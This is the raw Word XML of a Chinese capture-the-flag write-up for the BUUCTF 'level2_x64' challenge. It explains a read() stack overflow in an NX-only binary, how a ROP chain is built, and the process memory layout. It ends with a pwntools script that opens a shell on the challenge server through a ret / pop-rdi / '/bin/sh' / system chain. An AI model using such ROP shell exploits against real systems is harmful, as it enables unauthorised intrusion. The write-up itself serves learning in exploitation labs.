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CB4A" w14:textId="4FA2AD19" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616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和file一下文件，发现只开启了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18D5CC72" w14:textId="37081F0D" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F47616">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFEB502" wp14:editId="4E2DBE80">
            <wp:extent cx="5274310" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="143768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7D2D" w14:textId="4ACD42AB" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再放入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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A459D" w14:textId="4E3AB614" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F47616">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D67F72E" wp14:editId="27D3CFE9">
            <wp:extent cx="5274310" cy="877570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1556562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62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748C" w14:textId="07A09421" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F47616">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="365F6319" wp14:editId="046976E6">
            <wp:extent cx="4153480" cy="1590897"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1396719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19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A1B0" w14:textId="7DA90C0F" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现溢出函数read可以利用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溢出，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>为0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10F07D" w14:textId="5C15828E" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找system和/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D00359D" w14:textId="26505749" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F47616">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733150E6" wp14:editId="45F98F66">
            <wp:extent cx="4858428" cy="3286584"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1386135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3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6EEB" w14:textId="0F0EE063" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47616">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system和/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47616">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76F5B791" w14:textId="06538BFB" w:rsidR="00F47616" w:rsidRDefault="00F47616" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就因为开启了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所以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不可执行不能直接跳转，而要构造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链，先占满跳转ret，再到system，再到pop，ret，最后到/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="623AADA3" w14:textId="7AA160B2" w:rsidR="00411DB8" w:rsidRDefault="00411DB8" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：这里的/bin/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是一个字符串，不能直接进行跳转，必须调用system或者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才能发挥/bin/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的作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5E3E9" w14:textId="6EC8D17A" w:rsidR="00411DB8" w:rsidRDefault="00411DB8" w:rsidP="00F47616">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>计算机内存布局：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EA54C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高地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F583FC1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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792C593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 内核空间     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B278E9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3DD55AB0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│     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        │ ←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顶（RSP寄存器）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04D5D3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7D8BC8DB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   ↓         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A56527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(未分配空间)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42268314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   ↑         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F5E1F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634AAC84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内存映射区     │ ← 动态库、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C93B50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3CF55377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  堆        │ ← malloc/new分配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8FC92F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6925D874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.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段       │ （未初始化数据）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDC5CF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1BCA9714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.data段      │ （已初始化数据）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46129DED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534167C3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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rodata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段    │ （只读数据）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F367571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├─────────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37441C1C" w14:textId="77777777" w:rsidR="00411DB8" w:rsidRDefault="00411DB8" w:rsidP="00411DB8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│    代码区       │ （.text段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4691AE27" w14:textId="4AF73085" w:rsidR="00411DB8" w:rsidRDefault="00411DB8" w:rsidP="00411DB8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C056129" w14:textId="4B31A5BE" w:rsidR="00411DB8" w:rsidRDefault="009417DE" w:rsidP="00411DB8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009417DE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB057DE" wp14:editId="343EDC9F">
            <wp:extent cx="5274310" cy="2087245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="40933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7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4C00" w14:textId="3C3C1FA4" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="00411DB8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击脚本为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B9B5DD" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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1482CB1C" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#p = process('level2_x64')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6B341" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"node5.buuoj.cn", 28731)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407CCC3" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4709F8" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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addr_sys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x4004C0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62561A40" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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lastRenderedPageBreak/>
        <w:t>addr_binsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x600A90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39FB12" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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addr_prr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x4006b3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776191A4" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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addr_ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x4004a1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D31F1" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C11E402" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417D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 * (0x80 + 8) + p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addr_ret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addr_prr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addr_binsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) + p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addr_sys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55650B80" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20770132" w14:textId="77777777" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE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(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52968617" w14:textId="1075B0E3" w:rsidR="009417DE" w:rsidRDefault="009417DE" w:rsidP="009417DE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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009417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3F7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EA4294A"/>
    <w:lvl w:ilvl="0" w:tplc="F410D4C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751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16"/>
    <w:rsid w:val="00411DB8"/>
    <w:rsid w:val="009417DE"/>
    <w:rsid w:val="00F47616"/>
    <w:rsid w:val="00FE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9621"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{930FE7F4-4D83-48C6-B98A-2AB0A2E8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7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6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6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6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6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6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6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76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7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7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76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76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76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76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76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76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76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7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7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6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76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7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76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7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2025-06-12T13:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-12T14:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>